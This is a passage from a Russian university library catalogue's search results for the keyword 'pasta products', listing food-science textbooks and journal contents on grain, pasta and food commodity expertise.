Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

132 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ИЗДЕЛИЯ МАКАРОННЫЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 23
1. 
Товароведение пищевых продуктов [Текст] / И. Е. Кононенко [и др.], 1983. - 423 с.
Ключевые слова 
СОСТАВ ХИМИЧЕСКИЙ - ПРОДУКТЫ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- ПРОДУКТЫ ПИЩЕВЫЕ -- ЗЕРНО -- КРУПА -- МУКА -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ХЛЕБ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- Овощи -- Плоды -- Грибы -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОДУКТЫ ВКУСОВЫЕ -- ПРЯНОСТИ -- ПРИПРАВА -- КИСЛОТА ПИЩЕВАЯ -- ЧАЙ -- КОФЕ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- МЯСО -- СУБПРОДУКТЫ -- МЯСО ПТИЦЫ -- МЯСО КРОЛИКОВ -- МОЛОКО -- СЛИВКИ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- МОЛОКО СГУЩЕННОЕ -- МОЛОКО СУХОЕ -- МОРОЖЕНОЕ -- СЫР -- МАСЛО КОРОВЬЕ -- ЯЙЦА -- Рыба -- ИКРА -- ЖИР ПИЩЕВОЙ -- МАРГАРИН
Держатели документа (Информация об экземплярах) 
2. 
Товароведение пищевых продуктов [Текст] / В. Б. Тылкин [и др.] ; ред. В. Б. Тылкин, 1980. - 429 с.
Ключевые слова 
СОСТАВ ХИМИЧЕСКИЙ - ПРОДУКТЫ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- ПРОДУКТЫ ПИЩЕВЫЕ -- ЗЕРНО -- КРУПА -- МУКА -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ХЛЕБ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- Овощи -- Плоды -- Грибы -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОДУКТЫ ВКУСОВЫЕ -- ПРЯНОСТИ -- ПРИПРАВА -- КИСЛОТА ПИЩЕВАЯ -- ЧАЙ -- КОФЕ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- МЯСО -- СУБПРОДУКТЫ -- МЯСО ПТИЦЫ -- МЯСО КРОЛИКОВ -- МОЛОКО -- СЛИВКИ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- МОЛОКО СГУЩЕННОЕ -- МОЛОКО СУХОЕ -- МОРОЖЕНОЕ -- СЫР -- МАСЛО КОРОВЬЕ -- ЯЙЦА -- Рыба -- ИКРА -- ЖИР ПИЩЕВОЙ
Держатели документа (Информация об экземплярах) 
3. 
Товароведение зерномучных и кондитерских товаров [Текст] / Н. А. Смирнова [и др.] ; ред. М. А. Кутепова, 1989. - 351 с.
Держатели документа (Информация об экземплярах) 
4. 
Товароведение однородных групп продовольственных товаров [Текст] / ред. Л. Г. Елисеева, 2014. - 929 с.
Ключевые слова 
ТОВАРЫ ПРОДОВОЛЬСТВЕННЫЕ -- ТОВАРОВЕДЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- КАЧЕСТВО ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- МАРКИРОВКА ТОВАРА -- УПАКОВКА ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЗЕРНО -- МУКА -- КРУПА -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ БАРАНОЧНЫЕ -- ИЗДЕЛИЯ СУХАРНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ТОВАРЫ ПЛОДООВОЩНЫЕ -- ПОТЕРИ ПЛОДОВ -- ПОТЕРИ ОВОЩЕЙ -- КОНСЕРВИРОВАНИЕ ПЛОДООВОЩНОЙ ПРОДУКЦИИ -- ЗАМОРАЖИВАНИЕ ОВОЩЕЙ -- ЗАМОРАЖИВАНИЕ ПЛОДОВ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ЧАЙ -- КОФЕ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ САХАРИСТЫЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- ЖИР ПИЩЕВОЙ -- МАСЛО РАСТИТЕЛЬНОЕ -- МАРГАРИН -- СПРЕД -- МАЙОНЕЗ -- МОЛОКО -- СЛИВКИ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- СЫР -- КОНСЕРВЫ МОЛОЧНЫЕ -- МОРОЖЕНОЕ -- МАРКИРОВКА МОЛОЧНОЙ ПРОДУКЦИИ -- ПРОДУКТЫ МОЛОЧНЫЕ - ПИТАНИЕ ДЕТСКОЕ -- МЯСО -- МЯСО ПТИЦЫ -- ИЗДЕЛИЯ КОЛБАСНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- МОРЕПРОДУКТЫ

Учебник подготовлен в соответствии с образовательным стандартом третьего поколения – ФГОС ВПО по направлению подготовки «Товароведение» по базовой дисциплине профессионального цикла «Товароведение однородных групп продовольственных товаров».

В нем рассматриваются основные понятия и задачи товароведения продовольственных товаров, научные принципы систематизации и классификации продовольственных товаров, факторы, влияющие на формирование и сохранение их потребительских свойств. Дана характеристика пищевой ценности и потребительских свойств однородных групп продовольственных товаров, представлены современные принципы их классификации и кодирования, изложены требования к качеству и безопасности, рассмотрены основные дефекты и причины их возникновения, режимы хранения и сроки годности.

Для студентов бакалавриата, обучающихся по направлениям подготовки «Товароведение», «Торговое дело», «Технология продукции и организация общественного питания» и «Экономика».

5. 
Медведев Г. М. Технология макаронного производства [Текст] / Г. М. Медведев, 1998. - 270,[1] с.
Держатели документа (Информация об экземплярах) 
6. 
Новости торговли. - Журнал, 2006г. № 8
Оглавление 
  • Рябова, А. Перспектива на вырост / А. Рябова. - с.32-35
    Кл. слова: МАРМЕЛАД - рынок, рынок мармелада
  • Бубенцова, П. Увлечение цветом / П. Бубенцова. - с.43-46
    Кл. слова: СРЕДСТВА МОЮЩИЕ, РЫНОК МОЮЩИХ СРЕДСТВ
  • Козина, Е. Инвестиции в качество / Е. Козина. - с.36-40
    Кл. слова: ИЗДЕЛИЯ МАКАРОННЫЕ, РЫНОК МАКАРОННЫХ ИЗДЕЛИЙ
  • Бубенцова, П. Управляемая скидка / П. Бубенцова. - с.60-61
    Кл. слова: СКИДКА, БОНУС
7. 
Кондитерское и хлебопекарное производство. - Журнал, 2007г. № 7
Оглавление 
  • Морозова, О. Использование сортовой овсяной муки в производстве макарон / О. Морозова. - с.1
  • О проекте национального стандарта "Макаронные изделия. Методы идентификации". - с.3-4
    Кл. слова: ИЗДЕЛИЯ МАКАРОННЫЕ
  • Тарасова, В. В. Хлебобулочные изделия с пищевыми волокнами / В. В. Тарасова, А. А. Филатова, А. П. Нечаев. - с.5-7
  • Дубцов, Г. Г. Применение крахмала при производстве макаронных изделий быстрого приготовления / Г. Г. Дубцов, М. П. Дубцова, Н. Л. Андросова. - с.8-9
    Кл. слова: ИЗДЕЛИЯ МАКАРОННЫЕ
  • Сердечкина, А. А. Реологические свойства макаронного теста из цельносмолотого или пророщенного зерна пшеницы / А. А. Сердечкина. - с.10-11
  • Люнина, Е. М. Новый вид сырья для хлебопечения / Е. М. Люнина, С. В. Краус, В. С. Иунихина. - с.12-13
  • Гнатув, Е. М. Подготовка сырья к производству макаронных изделий с добавлением кукурузной муки / Е. М. Гнатув, В. С. Погорилий, М. Е. Чернов. - с.16-17
  • Кирюхина, М. Н. Индустрия пищевых ингредиентов: современное состояние и перспективы развития / М. Н. Кирюхина, Г. Г. Дубцов. - с.18-19
  • Кореневская-Давыдова, Е. В. Соотношение между концентрацией фосфатов и воспринимаемой кислотностью кофе / Е. В. Кореневская-Давыдова, А. Ф. Доронин. - с.20-21
Держатели документа (Информация об экземплярах) 
8. 
Кондитерское и хлебопекарное производство. - Журнал, 2006г. № 8
Оглавление 
  • Совершенствование технологии производства макаронных изделий быстрого приготовления. - с.4-7
    Кл. слова: ИЗДЕЛИЯ МАКАРОННЫЕ
  • Пищевая ценность и технологические качества околоплодной оболочки кедрового ореха. - с.8-10
  • Нечаев, А. П. Оптимизация состава жировых продуктов для мучных кондитерских изделий / А. П. Нечаев, Д. В. Понизник, А. В. Коваленок. - с.11-12
  • Бойцова, Е. Е. Особенности производства шоколадных паст / Е. Е. Бойцова, Л. И. Степанова. - с.14-15
    Кл. слова: ПАСТА шоколадная
Держатели документа (Информация об экземплярах) 
9. 
Пищевая промышленность. - Журнал, 2004г. № 5
Оглавление 
  • Тутельян, В. А. Питание и здоровье / В. А. Тутельян. - с.6-7
    Кл. слова: ПИТАНИЕ - ЗДОРОВЬЕ
  • Кочеткова, А. А. Соки и напитки в российской научной программе "Технологии живых систем" / А. А. Кочеткова, А. Ю. Колеснов. - с.8-11
  • Михеева, Г. А. Вкусоароматические компоненты витаминизированных напитков и киселей / Г. А. Михеева, В. М. Воробьева. - с.12-13
  • Лейн, Т. Е. Упакованный холодный чай (Ice - Tea) как перспективный продукт для российского рынка / Т. Е. Лейн. - с.14
    Кл. слова: ЧАЙ - ТОРГОВЛЯ, Чай холодный
  • Шулбаева, М. Т. Сохранение традиционных качеств пищевых продуктов при использовании пищевых волокон / М. Т. Шулбаева, К. Л. Коновалов. - с.16-17
  • Использование люпиновой муки при изготовлении макаронных изделий / ; Е. В. Петрова, Н. К. Казеннова, А. А. Глазунов, Т. И. Шнейдер. - с.18-20
    Кл. слова: ИЗДЕЛИЯ МАКАРОННЫЕ, мука люпиновая
  • Росляков, Ю. Ф. Цветокорректирующие добавки для макаронных изделий профилактического действия / Ю. Ф. Росляков, И. И. Уварова, Н. А. Шмалько. - с.21
  • Беспалов, В. В. Витаминно-минеральный премикс "Флагман" для обогащения хлебобулочных изделий / В. В. Беспалов. - с.22
  • Журавко, Е. В. Мука зародышей пшеницы для производства функциональных продуктов питания / Е. В. Журавко, Е. В. Грузинов, Е. И. Кострова. - с.23
  • Коновалов, К. Л. Микрокристаллическая целлюлоза в мясопродуктах / К. Л. Коновалов. - с.24
  • Рисовые продукты для консервов здорового питания / ; З. А. Троян, Л. В. Лычкина, Н. Н. Корастилева, С. Ю. Жажский. - с.25
  • Подкорытова, А. В. Морские водоросли - уникальное сырье для обогащения продуктов питания / А. В. Подкорытова. - с.27
    Кл. слова: ВОДОРОСЛИ МОРСКИЕ
  • Карагодин, В. П. Истинные и мнимые свойства БАД глазами экспертов / В. П. Карагодин, Р. М. Салимов, А. Н. Орехов. - с.29-31
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА
  • Михалев, А. А. Состояние и перспективы развития агропромышленного рынка России / А. А. Михалев. - с.32-34
  • Козин, Е. Б. Пообъектное формирование затрат / Е. Б. Козин, Т. А. Козина, Л. И. Шпилев. - с.36-37
    Кл. слова: ЗАТРАТЫ - предприятие пищевое
  • Маламуд, Д. Б. Теоретические основы создания устойчивого экономического развития / Д. Б. Маламуд. - с.38-40
  • Жапаров, К. Ж. Конкурентоспособность агропродукции Республики Казахстан / К. Ж. Жапаров. - с.41
  • Большаков, О. В. Методы сравнительной оценки функционирования научных организаций АПК / О. В. Большаков, Я. Г. Гараев, В. Г. Киселев. - с.42-45
  • Минаева, Е. В. Методы управления производством зерна в развитых странах мира / Е. В. Минаева, А. С. Чижик. - с.46-47
    Кл. слова: ЗЕРНО - производство
  • Чубенко, Н. Т. Хлебопекарная промышленность России в 1980-1990 годы / Н. Т. Чубенко. - с.48-49
  • Тужилкин, В. И. Дополнительное профессиональное образование возраждается / В. И. Тужилкин, В. С. Сергунов. - с.50-51
    Кл. слова: ОБРАЗОВАНИЕ ДОПОЛНИТЕЛЬНОЕ, ОБРАЗОВАНИЕ ПРОФЕССИОНАЛЬНОЕ, ПЕРЕПОДГОТОВКА преподавателей
  • Зелинский, Г. С. Технические регламенты на производство хлебопродуктов / Г. С. Зелинский. - с.52
  • Новожилова, О. А. Эксплуатация и обслуживание прачечного оборудования на предприятиях пищевой промышленности / О. А. Новожилова. - с.62-63
    Кл. слова: ОБОРУДОВАНИЕ ПРОМЫШЛЕННОЕ, Оборудование прачечное
  • Хода, Е. Г. Вакуумная упаковка пищевых продуктов в стеклянную тару системы "твист-офф" / Е. Г. Хода, Е. М. Тихонова. - с.70-71
    Кл. слова: ТАРА стеклянная
  • Чулюков, О. Г. Технологический контроль качества молочной продукции методом ближней инфракрасной спектроскопии / О. Г. Чулюков, . М. Кузьмичева, В. Г. Блиадзе. - с.76-77
    Кл. слова: КОНТРОЛЬ КАЧЕСТВА ПРОДУКЦИИ, ПРОДУКЦИЯ молочная
  • Проселков, В. Г. Российская система ХАССП: внедрение и сертификация / В. Г. Проселков. - с.80-81
  • Силаев, А. В. Низкокалорийный подсластитель. Вопросы практического применения в пищевой промышленности / А. В. Силаев, И. В. Тихонова, Ю. Г. Сметанина. - с.88-90
  • Беличенко, А. М. Союз производителей безалкогольных напитков / А. М. Беличенко. - с.104
  • Антонов, А. А. Союз предприятий холодильной промышленности / А. А. Антонов. - с.105
  • Российской академии сельскохозяйственных наук - 75 лет. - с.107
Держатели документа (Информация об экземплярах) 
10. 
Дубцов Г. Г. Товароведение продовольственных товаров [Текст] / Г. Г. Дубцов, 2014. - 333 с.
Ключевые слова 
ТОВАРЫ ПРОДОВОЛЬСТВЕННЫЕ -- ТОВАРОВЕДЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- КАЧЕСТВО ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЦЕННОСТЬ ФИЗИОЛОГИЧЕСКАЯ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЗЕРНО -- МУКА -- КРУПА -- ИЗДЕЛИЯ МАКАРОННЫЕ -- СОЛОД -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- КОРНЕПЛОДЫ -- ОВОЩИ -- ПЛОДЫ -- САХАР -- КРАХМАЛ -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОДУКТЫ ВКУСОВЫЕ -- НАПИТОК АЛКОГОЛЬНЫЙ -- ПИВО -- КВАС -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ЧАЙ -- КОФЕ -- ПРЯНОСТИ -- МОЛОКО -- СЛИВКИ -- КОНСЕРВЫ МОЛОЧНЫЕ -- МОЛОКО СУХОЕ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- СЫР -- МАСЛО КОРОВЬЕ -- МЯСО -- ИЗДЕЛИЯ КОЛБАСНЫЕ -- МЯСОКОПЧЕНОСТИ -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- МОРЕПРОДУКТЫ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ЖИР ПИЩЕВОЙ -- МАРГАРИН -- РАЗРЫХЛИТЕЛЬ ТЕСТА -- ДРОЖЖИ -- ВОДА -- УПАКОВКА -- ПОСУДА ОДНОРАЗОВАЯ
Держатели документа (Информация об экземплярах) 
11. 
Матвеева И. В. Учебное пособие по контролю за качеством хлебебулочных и макаронных изделий [Текст] / И. В. Матвеева, С. Е. Траубенберг, 1999. - 74 с.
Держатели документа (Информация об экземплярах) 
12. 
Шепелев А. Ф. Товароведение и экспертиза зерномучных товаров [Текст] : учеб. пособие / А. Ф. Шепелев, И. А. Печенежская, 2004. - 127 с.
Держатели документа (Информация об экземплярах) 
13. 
Медведев Г. М. Технология макаронного производства [Текст] : Учеб. для студ. вузов / Г. М. Медведев, 2000. - 270,[1] с.
Держатели документа (Информация об экземплярах) 
14. 
Иванова, Тамара Николаевна. Товароведение и экспертиза зерномучных товаров [Текст] : Учебник гриф-УМО / Т. Н. Иванова, 2004. - 288 с.
Держатели документа (Информация об экземплярах) 
15. 
Товароведение зерномучных и кондитерских товаров [Текст] : Учебник гриф-МО / И. П. Салун, Н. А. Смирнова, Е. А. Воробьева, 1981. - 344 с.
Держатели документа (Информация об экземплярах) 
16. 
Технологии пищевых производств [Текст] : учеб. для студентов высш. учеб. заведений / под общ. ред. А. П. Нечаева, 2005. - 767 с.
Ключевые слова 
ПИТАНИЕ - ЗДОРОВЬЕ -- ПИТАНИЕ НАСЕЛЕНИЯ -- ПРОДУКТЫ ПИЩЕВЫЕ -- БЕЛКИ - ПИТАНИЕ -- ЛИПИДЫ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- ВИТАМИНЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАН -- ВОДА - ПИТАНИЕ -- ПРОИЗВОДСТВО ПИЩЕВОЕ -- СТАНДАРТИЗАЦИЯ ПРОДУКЦИИ ПИЩ -- СЕРТИФИКАЦИЯ ПИЩЕВЫХ ПРОДУКТ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- СЫРЬЕ ПИЩЕВОЕ -- ЗЕРНО - ПРОИЗВОДСТВО -- солод -- КРАХМАЛ - ПРОИЗВОДСТВО -- САХАР - ПРОИЗВОДСТВО -- МУКА ПШЕНИЧНАЯ - ГОСТ -- МОЛОКО - производство -- ЯЙЦЕПРОДУКТЫ -- ДОБАВКА ПИЩЕВАЯ -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- БАД -- ПРОБИОТИКИ -- ТЕХНОЛОГИЯ ПРОДУКЦИИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- МАСЛО РАСТИТЕЛЬНОЕ -- ЖИРЫ - производство -- ПИВО - производство -- КВАС -- ДРОЖЖИ - производство -- кислота лимонная -- УКСУС -- КИСЛОТА молочная -- КОНЬЯК - производство -- ВИНОДЕЛИЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- КОНСЕРВЫ ОВОЩНЫЕ - ПРОИЗВОДС -- КОНСЕРВЫ ПЛОДООВОЩНЫЕ -- ЧАЙ - производство
Держатели документа (Информация об экземплярах) 
17. 
Барановский В. А. Продавец [Текст] : учеб. пособие для учащихся колледжей и средних проф.-тех. училищ / В. А. Барановский, 2000. - 412 с.
Ключевые слова 
ПРОДАВЕЦ -- СЕТЬ ТОРГОВАЯ РОЗНИЧНАЯ -- ТОРГОВЛЯ РОЗНИЧНАЯ -- МАГАЗИН - ПЛАНИРОВКА -- ТОВАРОСНАБЖЕНИЕ -- ОБОРУДОВАНИЕ ТОРГОВОЕ -- ИНВЕНТАРЬ ТОРГОВЫЙ -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- ОБОРУДОВАНИЕ ПОДЪЕМНО - ТРАНСПОРТНОЕ -- АППАРАТ контрольно-кассовый -- ОБОРУДОВАНИЕ ХОЛОДИЛЬНОЕ -- ОБОРУДОВАНИЕ ВЕСОИЗМЕРИТЕЛЬН -- ПРАВИЛА работы магазина -- ОРГАНИЗАЦИЯ РАБОЧЕГО МЕСТА продавца -- СПРОС ПОКУПАТЕЛЬСКИЙ -- ТАРА -- ПРИЕМКА ТОВАРОВ -- РЕКЛАМА ТОРГОВАЯ -- ОХРАНА ТРУДА - МАГАЗИН -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ -- КАЧЕСТВО ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ОВОЩИ -- МУКА -- КРУПА -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ТОВАРЫ МОЛОЧНЫЕ -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- РЫБА -- ТОВАРЫ ВКУСОВЫЕ -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- ТАБАК - ТОРГОВЛЯ -- ПРЯНОСТИ -- ПРИПРАВА -- ЖИР ПИЩЕВОЙ -- МАСЛО РАСТИТЕЛЬНОЕ -- МАРГАРИН -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ТОВАРЫ текстильные -- ТОВАРЫ швейные -- ТОВАРЫ ТРИКОТАЖНЫЕ -- ТОВАРЫ ОБУВНЫЕ -- ТОВАРЫ ГАЛАНТЕРЕЙНЫЕ -- ТОВАРЫ ПАРФЮМЕРНО-КОСМЕТИЧЕС -- КУЛЬТТОВАРЫ -- ТОВАРЫ СТЕКЛЯННЫЕ -- ТОВАРЫ КЕРАМИЧЕСКИЕ -- ТОВАРЫ МЕТАЛЛОХОЗЯЙСТВЕННЫЕ
Держатели документа (Информация об экземплярах) 
18. 
Идентификационная и товарная экспертиза продуктов растительного происхождения [Текст] / Л. Г. Елисеева [и др.] ; ред. Л. Г. Елисеева, 2014. - 523 с.
Ключевые слова 
ИДЕНТИФИКАЦИЯ ПРОДУКЦИИ -- ЭКСПЕРТИЗА ТОВАРНАЯ -- ФАЛЬСИФИКАЦИЯ ПРОДУКЦИИ -- ЭКСПЕРТИЗА ИДЕНТИФИКАЦИОННАЯ -- ТОВАРЫ ЗЕРНОМУЧНЫЕ -- ЗЕРНО -- МУКА -- КРУПА -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ БАРАНОЧНЫЕ -- ИЗДЕЛИЯ СУХАРНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ПЛОДЫ СВЕЖИЕ -- ОВОЩИ -- ПРИЕМКА СВЕЖИХ ПЛОДОВ -- ПРИЕМКА ОВОЩЕЙ -- ПРИЕМКА ПЛОДООВОЩНОЙ ПРОДУКЦИИ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ВОДА МИНЕРАЛЬНАЯ -- ЧАЙ -- КОФЕ -- ПРЯНОСТИ -- ПРИПРАВА -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ САХАРНЫЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- ПРОДУКТЫ ГЕНЕТИЧЕСКИ МОДИФИЦИРОВАННЫЕ -- ГМО -- МАРКИРОВКА ПИЩЕВОЙ ПРОДУКЦИИ -- ЗСГМО -- ИНЖЕНЕРИЯ ГЕННАЯ -- ГОСТ Р 51293-99 -- ПРОТОКОЛ ИДЕНТИФИКАЦИИ ПРОДУКЦИИ -- АКТ ОТБОРА ПРОБ -- ВСКРЫТИЕ ТАРЫ -- ЦЕЛОСТНОСТЬ УПАКОВКИ -- ОБРАЗЦЫ ДОКУМЕНТОВ
Держатели документа (Информация об экземплярах) 
19. 
Товароведение и экспертиза потребительских товаров [Текст] / В. В. Шевченко [и др.] ; рук. работы В. В. Шевченко, 2014. - 751 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ ПОТРЕБИТЕЛЬСКИХ ТОВАРОВ -- ЭКСПЕРТИЗА ПОТРЕБИТЕЛЬСКИХ ТОВАРОВ -- ТОВАРОВЕДЕНИЕ - ТЕОРИЯ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- КЛАССИФИКАЦИЯ ТОВАРА -- КОДИРОВАНИЕ ТОВАРА -- СОСТАВ ХИМИЧЕСКИЙ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ВОДА -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ -- УГЛЕВОДЫ -- ЛИПИДЫ -- ЖИРЫ -- ЛИПОИДЫ -- ВЕЩЕСТВА АЗОТСОДЕРЖАЩИЕ -- ВИТАМИН -- ФЕРМЕНТ -- КИСЛОТА ОРГАНИЧЕСКАЯ -- КОНСЕРВИРОВАНИЕ ПИЩЕВЫХ ПРОДУКТОВ -- ТАРА -- МАТЕРИАЛ УПАКОВОЧНЫЙ -- МАРКИРОВКА ПИЩЕВОЙ ПРОДУКЦИИ -- ТОВАРЫ ЗЕРНОМУЧНЫЕ -- ЗЕРНО -- КРУПА -- МУКА -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ БАРАНОЧНЫЕ -- ИЗДЕЛИЯ СУХАРНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПЛОДЫ СВЕЖИЕ -- ЯГОДЫ -- ОРЕХИ -- ОВОЩИ -- ТОВАРЫ ВКУСОВЫЕ -- ПРЯНОСТИ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК АЛКОГОЛЬНЫЙ -- ВИНО ВИНОГРАДНОЕ -- БРЕНДИ -- КОНЬЯК -- ИЗДЕЛИЯ ТАБАЧНЫЕ -- КРАХМАЛ -- КРАХМАЛОПРОДУКТЫ -- САХАР -- ЗАМЕНИТЕЛЬ САХАРА -- МЕД -- ТОВАРЫ КОНДИТЕРСКИЕ -- СЛАДОСТИ ВОСТОЧНЫЕ -- ТОВАРОВЕДЕНИЕ МОЛОЧНЫХ ТОВАРОВ -- МОЛОКО -- КОНСЕРВЫ МОЛОЧНЫЕ -- СЫР -- МАСЛО -- МОРОЖЕНОЕ -- ЖИРЫ -- ЖИР ПИЩЕВОЙ -- ТОВАРОВЕДЕНИЕ ПИЩЕВЫХ ЖИРОВ -- МАСЛО РАСТИТЕЛЬНОЕ -- ЖИР ТОПЛЕНЫЙ -- МАРГАРИН -- МАЙОНЕЗ -- ТОВАРОВЕДЕНИЕ МЯСНЫХ ПРОДУКТОВ -- МЯСО -- МЯСО ПТИЦЫ -- КОНСЕРВЫ МЯСНЫЕ -- ПОЛУФАБРИКАТЫ МЯСНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ТОВАРОВЕДЕНИЕ РЫБНЫХ ПРОДУКТОВ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ИКРА -- ПОЛУФАБРИКАТЫ РЫБНЫЕ -- МОРЕПРОДУКТЫ
Держатели документа (Информация об экземплярах) 
20. 
Современное состояние и перспективы развития индустрии питания и гостеприимства. В 2 т. Т. 2 [Текст] / ред. А. И. Барановский, 2012. - 187 с.
Ключевые слова 
Оглавление 
  • Заблицева, М. А. Характеристика овощного сырья, используемого в производстве йогуртов / М. А. Заблицева, И. А. Долматова. - с.4-8
    Кл. слова: ЙОГУРТ
  • Завгородняя, Л. М. Разработка и оптимизация рецептуры молочного десерта для школьного питания / Л. М. Завгородняя. - с.8-9
    Кл. слова: ДЕСЕРТ МОЛОЧНЫЙ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Загидуллин, Д. З. Влияние материала оборудования на окисление аскорбиновой кислоты / Д. З. Загидуллин, В. Ю. Кирсанов, Ф. Ф. Фазлыев. - с.9-12
    Кл. слова: ОКИСЛЕНИЕ, КИСЛОТА АСКОРБИНОВАЯ
  • Иванова, Л. П. Спорт и здоровье: функциональный продукты специального назначения / Л. П. Иванова, Л. В. Егорова, С. В. Чехунов. - с.13-18
    Кл. слова: СПОРТ - ЗДОРОВЬЕ
  • Ивкова, И. Д. Использование растительных жиров в современных пищевых производствах / И. Д. Ивкова, А. С. Пиляева. - с.18-21
    Кл. слова: ПРОИЗВОДСТВО ПИЩЕВОЕ, ЖИР РАСТИТЕЛЬНЫЙ
  • Ивченко, В. В. Сравнительная характеристика качества кофе натурального растворимого разных производителей / В. В. Ивченко, О. В. Бессонова. - с.22-24
    Кл. слова: КОФЕ
  • Калауденова, А. Т. Изучение потребительских предпочтений и экспертиза качества оливкого масла / А. Т. Калауденова. - с.25-32
    Кл. слова: МАСЛО ОЛИВКОВОЕ
  • Кирсанов, В. Ю. Изучение влияния УФ-излучения на микрофлору предприятий общественного питания на примере дрожжей SACCHAROMYCES CEREVISIAE / В. Ю. Кирсанов, С. Е. Шаталов, Д. З. Загидуллин. - с.32-34
    Кл. слова: УФ - ИЗЛУЧЕНИЯ, МИКРОФЛОРА, ДРОЖЖИ
  • Ковальчук, О. Г. Соблюдение водного режима в марафонском беге / О. Г. Ковальчук, П. А. Скрипников. - с.34-38
    Кл. слова: БЕГ МАРАФОНСКИЙ, РЕЖИМ ПИТЬЕВОЙ, ПИТЬЁ СПОРТИВНОЕ
